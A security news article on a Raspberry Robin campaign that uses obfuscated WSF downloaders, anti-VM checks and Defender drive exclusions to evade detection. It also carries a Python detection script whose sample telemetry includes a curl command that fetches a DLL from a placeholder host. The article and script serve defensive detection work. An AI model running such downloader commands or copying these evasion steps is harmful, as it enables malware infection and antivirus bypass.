Cybersecurity researchers have identified a new Raspberry Robin campaign wave that has propagated the malware by means of malicious Windows Script Files (WSFs) since March 2024.
“Historically, Raspberry Robin was known to spread through removable media like USB drives, but over time its distributors have experimented with other initial infection vectors,” HP Wolf Security said in a report shared with The Hacker News.
Raspberry Robin, also called QNAP worm, was first spotted in September 2021 and has since evolved into a downloader for various other payloads in recent years, such as SocGholish, Cobalt Strike, IcedID, BumbleBee, and TrueBot, while also serving as a precursor for ransomware.
While the malware was initially distributed by means of USB devices containing LNK files that retrieved the payload from a compromised QNAP device, it has since adopted other methods such as social engineering and malvertising.
It has been attributed to an emerging threat cluster tracked by Microsoft as Storm-0856, which has links to the broader cybercrime ecosystem comprising groups like Evil Corp, Silence, and TA505.
The latest distribution vector involves the use of WSF files that are offered for download via various domains and subdomains.
It's currently not clear how the attackers are directing victims to these URLs, although it's suspected that it could be either via spam or malvertising campaigns.
The heavily obfuscated WSF file functions as a downloader to retrieve the main DLL payload from a remote server using the curl command, but not before a series of anti-analysis and anti-virtual machine checks are carried out to determine if it's being run in a virtualized environment.
It's also designed to terminate execution if the build number of the Windows operating system is lower than 17063 (which was released in December 2017) and if the list of running processes includes antivirus processes associated with Avast, Avira, Bitdefender, Check Point, ESET, and Kaspersky.
What's more, it configures Microsoft Defender Antivirus exclusion rules in an effort to sidestep detection by adding the entire main drive to the exclusion list and preventing it from being scanned.
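Two of the behaviours described above are easy to hunt for in endpoint telemetry: a Windows script host (wscript.exe/cscript.exe) spawning curl.exe, and a Defender exclusion that covers a whole drive root. The following detection logic is an added example, not code from HP Wolf Security or The Hacker News; the key=value event format and the sample lines are constructed for illustration.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry (not real captures). Each line is one event
# as space-separated key=value pairs; values may themselves contain spaces.
SAMPLE_EVENTS = [
    "type=process parent=wscript.exe image=curl.exe cmdline=curl.exe -o C:\\Users\\Public\\lib.dll http://example.invalid/x",
    "type=process parent=explorer.exe image=curl.exe cmdline=curl.exe https://example.invalid/",
    "type=defender_exclusion path=C:\\",
    "type=defender_exclusion path=C:\\Program Files\\Vendor\\App",
    "type=process parent=wscript.exe image=notepad.exe cmdline=notepad.exe readme.txt",
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# A drive letter with nothing after it ("C:" or "C:\") is a whole-drive exclusion.
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")
# Split only on whitespace that is followed by the next "key=", so values keep their spaces.
FIELD_SPLIT = re.compile(r"\s+(?=[a-z_]+=)")


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value event line into a dict."""
    fields = {}
    for token in FIELD_SPLIT.split(line.strip()):
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def flag_event(ev: Dict[str, str]) -> List[str]:
    """Return the reasons (if any) this event matches the behaviours in the article."""
    reasons = []
    if ev.get("type") == "process":
        parent = ev.get("parent", "").lower()
        image = ev.get("image", "").lower()
        if parent in SCRIPT_HOSTS and image == "curl.exe":
            reasons.append("script host spawned curl.exe")
    elif ev.get("type") == "defender_exclusion":
        if DRIVE_ROOT.match(ev.get("path", "")):
            reasons.append("Defender exclusion covers an entire drive")
    return reasons


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Scan event lines and return (line index, reason) for every match."""
    return [(i, r) for i, line in enumerate(lines) for r in flag_event(parse_event(line))]


if __name__ == "__main__":
    for idx, reason in scan(SAMPLE_EVENTS):
        print(f"line {idx}: {reason}")
```

Neither rule alone is proof of Raspberry Robin, but both are rare in normal endpoint activity and together point at the script-host downloader and the Defender-exclusion step described by HP.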
“The scripts themselves are currently not classified as malicious by any anti-virus scanners on VirusTotal, demonstrating the evasiveness of the malware and the risk of it causing a significant infection with Raspberry Robin,” HP said.
“The WSF downloader is heavily obfuscated and uses several anti-analysis techniques enabling the malware to evade detection and slow down analysis.”
Some parts of this post are sourced from:
thehackernews.com